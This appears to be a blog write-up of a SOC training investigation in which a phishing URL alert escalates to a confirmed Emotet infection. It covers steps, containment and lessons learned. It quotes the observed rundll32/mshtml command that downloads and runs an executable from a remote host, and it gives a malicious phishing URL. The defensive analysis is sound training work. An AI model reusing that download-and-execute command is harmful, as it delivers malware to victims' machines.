AbbySec

My digital playground – where hacking meets learning.

View on GitHub
27 February 2026

SOC141 – Phishing URL Escalation to Emotet Infection

by

🧠 Summary

This investigation began as a Phishing URL Detected (SOC141) alert.

Initial proxy analysis confirmed that a user accessed a malicious phishing domain.

However, deeper endpoint log investigation revealed abuse of rundll32.exe to download and execute an Emotet banking trojan.

What started as phishing escalated into a confirmed malware infection incident.


🚨 Alert Overview


🔎 Step 1 – Phishing URL Analysis

Observed request:

http://mogagrocol.ru/wp-content/plugins/akismet/fv/index.php?email=ellie@letsdefend.io

🚩 Suspicious Indicators


🖼 VirusTotal URL Analysis

VT RESULT 1

Result:

At this stage, alert was confirmed as:

True Positive – Phishing URL Access


🔍 Step 2 – Log Management Verification

Search performed in Log Management for:

Confirmed:


🖼 Proxy RAW Log Evidence

Proxy Log


🔥 Step 3 – Suspicious Command Execution Observed

While reviewing endpoint logs, the following command was discovered:

rundll32.exe javascript:..\mshtml,RunHTMLApplication document.write();GetObject('script:http://ru-uid-507352920.pp.ru/KBDYAK.exe

🚨 Why This Is Malicious

This confirms malware execution occurred.

🖼 Suspicious Command Screenshot

CLI Log Snippet


🦠 Step 4 – Malware Hash Investigation

Downloaded file:

KBDYAK.exe

🖼 VirusTotal EXE Detection

VT Result 2

VirusTotal Result:

Behavior tags observed:


🧬 Malware Classification


🛑 Containment Actions Taken

🛡️ Contaiment Snippet

Contained


📊 Final Investigation Conclusion

Category Result
Phishing URL Malicious
Malware Download Confirmed
Execution Observed
C2 Communication Likely
Host Compromise Confirmed
Alert Classification True Positive

🧠 Key Lessons Learned

  1. Never stop at phishing confirmation.
  2. Always review endpoint command execution logs.
  3. rundll32 + mshtml is a high-risk indicator.
  4. Phishing often serves as initial access vector.
  5. Deep pivoting leads to full compromise discovery.

🎯 MITRE ATT&CK Mapping


🔐 Final Thoughts

This case demonstrates how a seemingly simple phishing URL alert can escalate into a confirmed Emotet infection.

Without endpoint log analysis, the case could have been prematurely closed.

Deep investigation matters.


tags: